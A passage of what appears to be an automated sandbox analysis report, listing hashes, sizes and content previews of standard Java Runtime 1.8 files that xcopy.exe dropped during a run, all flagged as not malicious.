                                                                                                                                                                                                                                  Preview:PK........Cp.V................META-INF/....PK........Bp.VB1.Wi...i.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.6..Created-By: 1.8.0_381-b09 (Oracle Corporation)....PK........Bp.V................com/PK........Bp.V................com/sun/PK........Cp.V................com/sun/javaws/PK........Bp.V................com/sun/javaws/exceptions/PK........Bp.V................com/sun/javaws/jnl/PK........Bp.V................com/sun/javaws/net/PK........Bp.V................com/sun/javaws/net/protocol/PK........Bp.V............ ...com/sun/javaws/net/protocol/jar/PK........Bp.V................com/sun/javaws/progress/PK........Bp.V................com/sun/javaws/security/PK........Cp.V................com/sun/javaws/ui/PK........Cp.V................com/sun/javaws/util/PK........Cp.V................com/sun/jnlp/PK........Ap.V................javax/PK........Cp.V................javax/jnlp/PK........Bp.V.T..........#...com/sun/javaws/BrowserSupport.class.......1.&...()V...(
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):122724
                                                                                                                                                                                                                                  Entropy (8bit):7.918567382108161
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:p+uhK+XLGLuDfH3HiMAHElMueD+UgUBvVE:/f6Y3HiLvJ+Uju
                                                                                                                                                                                                                                  MD5:E0B7E0F36B9FC43D13403145DB82E758
                                                                                                                                                                                                                                  SHA1:DEF42078CFA315E98393C69963EFB4E35E2E28A8
                                                                                                                                                                                                                                  SHA-256:4362C179BB78107777D6A0557693E65EB2B318C26642162F89509DFDAB8C97FE
                                                                                                                                                                                                                                  SHA-512:5074A7CEB9621096F3BBF419D32AC260EA6D9D09C758544C2761121026C2B9DB0B6617806D3B692347B685D541123F4EDA99DCBAA29D9C9A2D740B22C44BF7BB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):574271
                                                                                                                                                                                                                                  Entropy (8bit):5.7807704652102805
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:Z5l+qU67FYWg+YWgYWeoXqgYSqYQh2f/m5NwaHkSIJHvWQ6Q7ooMcgH5lY7TQ5cu:Z5l+qU67FYWg+YWgYWeoXqgYSqYQh2fa
                                                                                                                                                                                                                                  MD5:CFBF1D7E15726ECBA7A7506B6E43EF1D
                                                                                                                                                                                                                                  SHA1:2CE147B0C1030003ABDB4323D4E2356104CBDA52
                                                                                                                                                                                                                                  SHA-256:C5FDD101242C9F7D47BD887F862C5A724AC2144E71DE22C2973B48F4DB4D0010
                                                                                                                                                                                                                                  SHA-512:1AB1D8A001ADDF8941ECDE71319E6CC2A71A1964FD397D95E1E4A0CFC0045BFBBBF334242522F37F0AEAFC8682C8D5A0B2E2A067233111CFAE86802203D7729E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/....PK.........p.V....?...?.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_381..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_291 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK.........n.VB.<>^...^...8...com/oracle/jrockit/jfr/client/EventSettingsBuilder.class.......4....5.f..g....f..4.h..4.i..j....f..4.k..l....m..4.n..o....f..4.p..q..r....f....s....t....u....v..w..x..y....z..{....|....}....~.................................#.........................)...................................................eventDefaultSets...Ljava/util/ArrayList;...Signature..DLjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventDefaultSet;>;...settings..ALjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventSetting;>;...eventDescriptorType..2Loracle/jrockit/jfr/openmbean
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20848
                                                                                                                                                                                                                                  Entropy (8bit):4.569027178886632
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:/JA1ySPBhRt0ng3Ca66LAsmztuxqCbCdCsCNG2ixzTJDZi5OAdzAMzVdWVqGKxtE:/J4yS5zaaedc2Fch8
                                                                                                                                                                                                                                  MD5:09FF01E042E7D016217A23F29250C193
                                                                                                                                                                                                                                  SHA1:E60D9AAA39C5F0EF4A54DA5107B0C75AB491DF0E
                                                                                                                                                                                                                                  SHA-256:05079C086677FF5ADA9853F60B7B1C623750C7A97C6EEC692E54AD7EBF51D343
                                                                                                                                                                                                                                  SHA-512:50ABC8F6C0EEEF68B600826FFB5ADC1C329996882D4EF378C65A1C5330E1177222E48FD1A0C4798116EE63CC231FFBD120E22ED82290D975DC81CA246F0E1CB3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8"?>.. . Recommended way to edit .jfc files is to use Java Mission Control,. see Window -> Flight Recorder Template Manager..-->..<configuration version="1.0" name="Continuous" description="Low overhead configuration safe for continuous use in production environments, typically less than 1 % overhead." provider="Oracle">.. <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.. <control>.. . Contents of the control element is not read by the JVM, it's used. by Java Mission Control to change settings that carry the control attribute.. -->.. <selection name="gc-level" default="detailed" label="Garbage Collector">. <option label="Off" name="off">off</option>. <option label="Normal" name="detailed">normal</option>. <option label="All" name="all">all</option>. </selection>.. <condition name="gc-enabled-normal" true="true" false="false">. <or>.
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20804
                                                                                                                                                                                                                                  Entropy (8bit):4.568706382799236
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:/fA1ypPOdhJt0ng3Ca66L0smztuxqHbHdHsHNG2iYzTJDZ95OAdzAMzVdWVqGKxW:/f4ypy3aamd79Mrhw
                                                                                                                                                                                                                                  MD5:67735A686D709D5612FAE97CD67ECF07
                                                                                                                                                                                                                                  SHA1:5AE707011FB0ADAF564D2C71D8E6443AADDD6809
                                                                                                                                                                                                                                  SHA-256:57F1556CD4A7554944B8339A4C29CC25C1C462418E42D22A2F84F8B713205826
                                                                                                                                                                                                                                  SHA-512:5BA2FB473FA4B3E6C4F13B0AADC5030D35498A8413C928CB6E5F67832CB164238222A21275E7E99CB476F095AB901250417D1F10B2F5E305BD13980182E9C38D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8"?>.. . Recommended way to edit .jfc files is to use Java Mission Control,. see Window -> Flight Recorder Template Manager..-->..<configuration version="1.0" name="Profiling" description="Low overhead configuration for profiling, typically around 2 % overhead." provider="Oracle">.. <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.. <control>.. . Contents of the control element is not read by the JVM, it's used. by Java Mission Control to change settings that carry the control attribute.. -->.. <selection name="gc-level" default="detailed" label="Garbage Collector">. <option label="Off" name="off">off</option>. <option label="Normal" name="detailed">normal</option>. <option label="All" name="all">all</option>. </selection>.. <condition name="gc-enabled-normal" true="true" false="false">. <or>. <test name="gc-level" operator="equal"
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33918
                                                                                                                                                                                                                                  Entropy (8bit):7.932455948320408
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:kYaExj8sT4fsUMLJgCsdw19SKYqLkClJzxeojN+WIGAQcrM:kYljDTI/MyCsdw1cj8LjN+W9CrM
                                                                                                                                                                                                                                  MD5:673A9978C583B1BB381E2265569CD908
                                                                                                                                                                                                                                  SHA1:09EB8FDA2FB44557A069EA989479154A5123A74D
                                                                                                                                                                                                                                  SHA-256:75C39AEB0892D8464EA42F9BF29C347D88CE857B28926B4F392AA2084B4F77E5
                                                                                                                                                                                                                                  SHA-512:BC8476C49565A2DE88F82255E213A3B69FD647E8F4AFAEDA6929EC92087C870032A514433768C0F6C0E955698B91236EF296D0C0638E57DAAC9AA712169468CF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1790321
                                                                                                                                                                                                                                  Entropy (8bit):5.939561849305967
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:7jhqT+YELjm0Ru1G7ouJXe2bmficeH0nNXHcKqJGX:7jhXvR4G7XJnbUsHs3
                                                                                                                                                                                                                                  MD5:0951883FEBB57F245EE4F4B7ECDDD470
                                                                                                                                                                                                                                  SHA1:5C086340C6B584E326EC8043442E3030FE601C50
                                                                                                                                                                                                                                  SHA-256:9E15BE38FF68E974BC7D5015F305104E07F47A2522F4330530114D74113DAF9A
                                                                                                                                                                                                                                  SHA-512:B08C8016B7D767A04A9E815DD64EDA35448F604EB7A2ECB40810D5344947EA5277F0BFF82A69278F737410DF1AE24CAD3F85D07346E87A8B2B548F0ED6F1A690
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/....PK.........p.V....?...?.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_381..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_291 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK.........n.V`..b........+...com/sun/net/ssl/internal/ssl/Provider.class.......4.....()V...()Z...<init>...J..%com/sun/net/ssl/internal/ssl/Provider...install...isFIPS...serialVersionUID...sun/security/ssl/SunJSSE.,..c".J-.........(Ljava/lang/String;)V...(Ljava/security/Provider;)V...........................................Code...ConstantValue.1................................................*..............................*+..............................*+.........).............................)...........................PK.........n.V3.2........;...com/sun/net/ssl/internal/ssl/X5
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Algol 68 source, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4226
                                                                                                                                                                                                                                  Entropy (8bit):4.708892688554676
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:CYrYJDrYJ+RvJ3z3d9uGG7hPxTRnhTbraYfwE5DyK:CYrsDrsgvJ3z3buGG7LvSmhDz
                                                                                                                                                                                                                                  MD5:C677FF69E70DC36A67C72A3D7EF84D28
                                                                                                                                                                                                                                  SHA1:FBD61D52534CDD0C15DF332114D469C65D001E33
                                                                                                                                                                                                                                  SHA-256:B055BF25B07E5AC70E99B897FB8152F288769065B5B84387362BB9CC2E6C9D38
                                                                                                                                                                                                                                  SHA-512:32D82DAEDBCA1988282A3BF67012970D0EE29B16A7E52C1242234D88E0F3ED8AF9FC9D6699924D19D066FD89A2100E4E8898AAC67675D4CD9831B19B975ED568
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:Copyright (c) 2003, 2005, Oracle and/or its affiliates. All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions.are met:.. - Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer... - Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... - Neither the name of Oracle nor the names of its. contributors may be used to endorse or promote products derived. from this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS.IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,.THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR.PURPOSE ARE DISCLAIMED.
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2455
                                                                                                                                                                                                                                  Entropy (8bit):4.47026133037931
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:EmdS5PQQL8pRNYHjVsnkYXxtOGh1xdvjMgxH:G9NL3HjVLG1XrM8H
                                                                                                                                                                                                                                  MD5:809C50033F825EFF7FC70419AAF30317
                                                                                                                                                                                                                                  SHA1:89DA8094484891F9EC1FA40C6C8B61F94C5869D0
                                                                                                                                                                                                                                  SHA-256:CE1688FE641099954572EA856953035B5188E2CA228705001368250337B9B232
                                                                                                                                                                                                                                  SHA-512:C5AA71AD9E1D17472644EB43146EDF87CAA7BCCF0A39E102E31E6C081CD017E01B39645F55EE87F4EA3556376F7CAD3953CE3F3301B4B3AF265B7B4357B67A5C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:############################################################.# .Default Logging Configuration File.#.# You can use a different file by specifying a filename.# with the java.util.logging.config.file system property. .# For example java -Djava.util.logging.config.file=myfile.############################################################..############################################################.# .Global properties.############################################################..# "handlers" specifies a comma separated list of log Handler .# classes. These handlers will be installed during VM startup..# Note that these classes must be on the system classpath..# By default we only configure a ConsoleHandler, which will only.# show messages at the INFO and above levels..handlers= java.util.logging.ConsoleHandler..# To also add the FileHandler, use the following line instead..#handlers= java.util.logging.FileHandler, java.util.logging.ConsoleHandler..# Default global logging level..# This
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):382
                                                                                                                                                                                                                                  Entropy (8bit):4.993267703911635
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:5jgCB4r/Rjgezbdy/oocj+od0X2K5YZ5/Cy9xxgsm4xq7lgxmzbdGh/7:5j7GJjpq1cCA0XPA/CcxRc6x2K/7
                                                                                                                                                                                                                                  MD5:7A26C9F31EBCEE53B813BB24DA580FEF
                                                                                                                                                                                                                                  SHA1:1ECE12D6182D5E8ACF5200E0202647E4E048A604
                                                                                                                                                                                                                                  SHA-256:6DB1FE5E7E897276A16C1AC5C9D1992636D3FB5D1E1A286A8BF5A49B51E495E8
                                                                                                                                                                                                                                  SHA-512:4059F8767A69147ADD24607B7CAD14994CA9E1EDC0213DCC189309CA5E663A0FBE4A6793B44E13382F6A41B79983F0034241DABA597F1F9B3921D73701B0C3B5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3998
                                                                                                                                                                                                                                  Entropy (8bit):4.420205717459709
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:OWi7j79eK8MCN/xK4ijnv+wtosJj/D9mQyZWZuQgQX+dv:OWiv7b8rNXE+wusxr9m5WZuVDv
                                                                                                                                                                                                                                  MD5:F63BEA1F4A31317F6F061D83215594DF
                                                                                                                                                                                                                                  SHA1:21200EAAD898BA4A2A8834A032EFB6616FABB930
                                                                                                                                                                                                                                  SHA-256:439158EB513525FEDA19E0E4153CCF36A08FE6A39C0C6CEEB9FCEE86899DD33C
                                                                                                                                                                                                                                  SHA-512:DE49913B8FA2593DC71FF8DAC85214A86DE891BEDEE0E4C5A70FCDD34E605F8C5C8483E2F1BDB06E1001F7A8CF3C86CAD9FA575DE1A4DC466E0C8FF5891A2773
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:######################################################################.# Default Access Control File for Remote JMX(TM) Monitoring.######################################################################.#.# Access control file for Remote JMX API access to monitoring..# This file defines the allowed access for different roles. The.# password file (jmxremote.password by default) defines the roles and their.# passwords. To be functional, a role must have an entry in.# both the password and the access files..#.# The default location of this file is $JRE/lib/management/jmxremote.access.# You can specify an alternate location by specifying a property in .# the management config file $JRE/lib/management/management.properties.# (See that file for details).#.# The file format for password and access files is syntactically the same.# as the Properties file format. The syntax is described in the Javadoc.# for java.util.Properties.load..# A typical access file has multiple lines, where each
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2856
                                                                                                                                                                                                                                  Entropy (8bit):4.492265087792545
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:MGS+Hpamow7YNkjP9YZAuFovuAnNpG1GMV/BWEUHXYE9nN6k5:Mdm7RT9tvuAnujaE0rN6g
                                                                                                                                                                                                                                  MD5:7B46C291E7073C31D3CE0ADAE2F7554F
                                                                                                                                                                                                                                  SHA1:C1E0F01408BF20FBBB8B4810520C725F70050DB5
                                                                                                                                                                                                                                  SHA-256:3D83E336C9A24D09A16063EA1355885E07F7A176A37543463596B5DB8D82F8FA
                                                                                                                                                                                                                                  SHA-512:D91EEBC8F30EDCE1A7E16085EB1B18CFDDF0566EFAB174BBCA53DE453EE36DFECB747D401E787A4D15CC9798E090E19A8A0CF3FC8246116CE507D6B464068CDB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ----------------------------------------------------------------------.# Template for jmxremote.password.#.# o Copy this template to jmxremote.password.# o Set the user/password entries in jmxremote.password.# o Change the permission of jmxremote.password to read-only.# by the owner..#.# See below for the location of jmxremote.password file..# ----------------------------------------------------------------------..##############################################################.# Password File for Remote JMX Monitoring.##############################################################.#.# Password file for Remote JMX API access to monitoring. This.# file defines the different roles and their passwords. The access.# control file (jmxremote.access by default) defines the allowed.# access for each role. To be functional, a role must have an entry.# in both the password and the access files..#.# Default location of this file is $JRE/lib/management/jmxremote.password.# You
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14630
                                                                                                                                                                                                                                  Entropy (8bit):4.568210341404396
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Fqsmpsj42wbZTHV+Dq3xtP3xPqaNC/R1a:wsmpsjL0ZTHV++3xtpi68Xa
                                                                                                                                                                                                                                  MD5:5EDB0D3275263013F0981FF0DF96F87E
                                                                                                                                                                                                                                  SHA1:E0451D8D7D9E84D7B1C39EC7D00993307A5CBBF1
                                                                                                                                                                                                                                  SHA-256:3A923735D9C2062064CD8FD30FF8CCA84D0BC0AB5A8FAB80FDAD3155C0E3A380
                                                                                                                                                                                                                                  SHA-512:F31A3802665F9BB1A00A0F838B94AE4D9F1B9D6284FAF626EBE4F96819E24494771A1B8BFE655FD2DA202C5463D47BAE3B2391764E6F4C5867C0337AA21C87C1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#####################################################################.#.Default Configuration File for Java Platform Management.#####################################################################.#.# The Management Configuration file (in java.util.Properties format).# will be read if one of the following system properties is set:.# -Dcom.sun.management.jmxremote.port=<port-number>.# or -Dcom.sun.management.snmp.port=<port-number>.# or -Dcom.sun.management.config.file=<this-file>.#.# The default Management Configuration file is:.#.# $JRE/lib/management/management.properties.#.# Another location for the Management Configuration File can be specified.# by the following property on the Java command line:.#.# -Dcom.sun.management.config.file=<this-file>.#.# If -Dcom.sun.management.config.file=<this-file> is set, the port.# number for the management agent can be specified in the config file.# using the following lines:.#.# ################ Management Agent Port ################
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3376
                                                                                                                                                                                                                                  Entropy (8bit):4.371600962667748
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:MkX7W6+IX6XXZAHAvuAn97+onkFOqRCjEhd//SVBteM8hq/unuxsIsxuEAJw2n:MU6bpjvuAnEokSIU/uuxJn
                                                                                                                                                                                                                                  MD5:71A7DE7DBE2977F6ECE75C904D430B62
                                                                                                                                                                                                                                  SHA1:2E9F9AC287274532EB1F0D1AFCEFD7F3E97CC794
                                                                                                                                                                                                                                  SHA-256:F1DC97DA5A5D220ED5D5B71110CE8200B16CAC50622B33790BB03E329C751CED
                                                                                                                                                                                                                                  SHA-512:3A46E2A4E8A78B190260AFE4EEB54E7D631DB50E6776F625861759C0E0BC9F113E8CD8D734A52327C28608715F6EB999A3684ABD83EE2970274CE04E56CA1527
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ----------------------------------------------------------------------.# Template for SNMP Access Control List File.#.# o Copy this template to snmp.acl.# o Set access control for SNMP support.# o Change the permission of snmp.acl to be read-only.# by the owner..#.# See below for the location of snmp.acl file..# ----------------------------------------------------------------------..############################################################.# SNMP Access Control List File .############################################################.#.# Default location of this file is $JRE/lib/management/snmp.acl..# You can specify an alternate location by specifying a property in .# the management config file $JRE/lib/management/management.properties.# or by specifying a system property (See that file for details)..#...##############################################################.# File permissions of the snmp.acl file.##############################################
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2126
                                                                                                                                                                                                                                  Entropy (8bit):4.970874214349507
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:EE796OfeCiuG2M5tP5iMmC5KOAY2HQii+r4IzteKk:EnEiuGJbP5lmC5KOA3HQii+EIz8Kk
                                                                                                                                                                                                                                  MD5:91AA6EA7320140F30379F758D626E59D
                                                                                                                                                                                                                                  SHA1:3BE2FEBE28723B1033CCDAA110EAF59BBD6D1F96
                                                                                                                                                                                                                                  SHA-256:4AF21954CDF398D1EAE795B6886CA2581DAC9F2F1D41C98C6ED9B5DBC3E3C1D4
                                                                                                                                                                                                                                  SHA-512:03428803F1D644D89EB4C0DCBDEA93ACAAC366D35FC1356CCABF83473F4FEF7924EDB771E44C721103CEC22D94A179F092D1BFD1C0A62130F076EB82A826D7CB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..# charsets.jar..sun/nio..sun/awt..# jce.jar..javax/crypto..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# jfr.jar..oracle/jrockit/..jdk/jfr..com/oracle/jrockit/..! jsse.jar..sun/security..com/sun/net/..! management-agent.jar..@ resources.jar..com/sun/java/util/jar/pack/..META-INF/services/sun.util.spi.XmlPropertiesProvider..META-INF/services/javax.print.PrintServiceLookup..com/sun/corba/..META-INF/services/javax.sound.midi.spi.SoundbankReader..sun/print..META-INF/services/javax.sound.midi.spi.MidiFileReader..META-INF/services/sun.java2d.cmm.CMMServiceProvider..javax/swing..META-INF/services/javax.sound.sampled.spi.AudioFileReader..META-INF/services/javax.sound.midi.spi.MidiDeviceProvider..sun/net..META-INF/services/javax.sound.sampled.spi.AudioFileWriter..com/sun/imageio/..META-INF/services/sun.java2d.pipe.Ren
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5352
                                                                                                                                                                                                                                  Entropy (8bit):4.817652960703195
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:6AcEvVEtGObfObz3Obm0ObPOnte3CO0V+r/aJ7SFvgTzDuBnZky:YEVGG4f4z34m04Pet5m27SRgTe9f
                                                                                                                                                                                                                                  MD5:8BC6628D01BAD30798440CC00F638165
                                                                                                                                                                                                                                  SHA1:FD9471742EB759F4478BB1DE9A0DC0527265B6EA
                                                                                                                                                                                                                                  SHA-256:31CE7CE29C66A1696A985A197195B5E051B2C243EA83E9D1DE614F0C4B4F7530
                                                                                                                                                                                                                                  SHA-512:8DA3439774A07A6309F985D1A29DDA5383975BBDF6B8E2809BAB69A2C44F65D3DE2A546231ED6E183864193F834C9A7042FDCC4EE10181D0BD3891363032C242
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:############################################################.# Default Networking Configuration File.#.# This file may contain default values for the networking system properties..# These values are only used when the system properties are not specified.# on the command line or set programatically..# For now, only the various proxy settings can be configured here..############################################################..# Whether or not the DefaultProxySelector will default to System Proxy.# settings when they do exist..# Set it to 'true' to enable this feature and check for platform.# specific proxy settings.# Note that the system properties that do explicitely set proxies.# (like http.proxyHost) do take precedence over the system settings.# even if java.net.useSystemProxies is set to true...java.net.useSystemProxies=false..#------------------------------------------------------------------------.# Proxy configuration for the various protocol handlers..# DO NOT uncomment th
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1924789
                                                                                                                                                                                                                                  Entropy (8bit):6.073418732218999
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:C+jgNAr7NJVQSWUNZU4sTwIH+/G5jyvsZ:CSgNwxJ5PZdG5lZ
                                                                                                                                                                                                                                  MD5:32A464B5B6584C2A54B86F477A29DF5A
                                                                                                                                                                                                                                  SHA1:6F2C8CF78D9074C81D3E874C7C0116402AEEF8E2
                                                                                                                                                                                                                                  SHA-256:B57B5A8EC4034C39452DF10E03AA6E4C98309524D6C90CC87A440790AB29FBC9
                                                                                                                                                                                                                                  SHA-512:9D03871B3D5648D32B127F482758C908A89CD0E3033E530AB02F1F96A9F73172D8770E9491961C8CD4D28C74651C4B18069B8880D6DCE8F8576765EF08AA8C9B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2796
                                                                                                                                                                                                                                  Entropy (8bit):5.182793663606788
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:R8s89HoIbTUjbyuJdI2FylXLr96cpcnnI0adbEk+IqdouZ:y56CiPFylXLrMGyJU+B
                                                                                                                                                                                                                                  MD5:7C5514B805B4A954BC55D67B44330C69
                                                                                                                                                                                                                                  SHA1:56ED1C661EEEDE17B4FAE8C9DE7B5EDBAD387ABC
                                                                                                                                                                                                                                  SHA-256:0C790DE696536165913685785EA8CBE1AC64ACF09E2C8D92D802083A6DA09393
                                                                                                                                                                                                                                  SHA-512:CCD4CB61C95DEFDCBA6A6A3F898C29A64CD5831A8AB50E0AFAC32ADB6A9E0C4A4BA37EB6DEE147830DA33AE0B2067473132C0B91A21D546A6528F42267A2C40E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.#.# Copyright (c) 1996, 2000, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#..#.#.Japanese PostScript printer property file.#.font.num=16.#.serif=serif.timesroman=serif.sansserif=sansserif.helvetica=sansserif.monospaced=monospaced.courier=monospaced.dialog=sansserif.dialoginput=monospaced.#.serif.latin1.plain=Times-Roman.serif.latin1.italic=Times-Italic.serif.latin1.bolditalic=Times-BoldItalic.serif.latin1.bold=Times-Bold.#.sansserif.latin1.plain=Helvetica.sansserif.latin1.italic=Helvetica-Oblique.sansserif.latin1.bolditalic=Helvetica-BoldOblique.sansserif.latin1.bold=Helvetica-Bold.#.monospaced.latin1.plain=Courier.monospaced.latin1.italic=Courier-Oblique.monospaced.latin1.bolditalic=Courier-BoldOblique.monospaced.latin1.bold=Courier-Bold.#.serif.x11jis0208.plain=Ryumin-Light-H.serif.x11jis0208.italic=Ryumin-Light-H.serif.x11jis0208.bolditalic=Ryumin-Light-H.serif.x11jis
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10393
                                                                                                                                                                                                                                  Entropy (8bit):4.970762688893053
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:hPwn+Cyub3Ee4OECKDIcYOhAgZ50OKDQLT2IcpRuWRbHr9NRXUh/QTv9Ho39zPxq:5xzubEFOEscAW5VKsCfHz8RPxGt
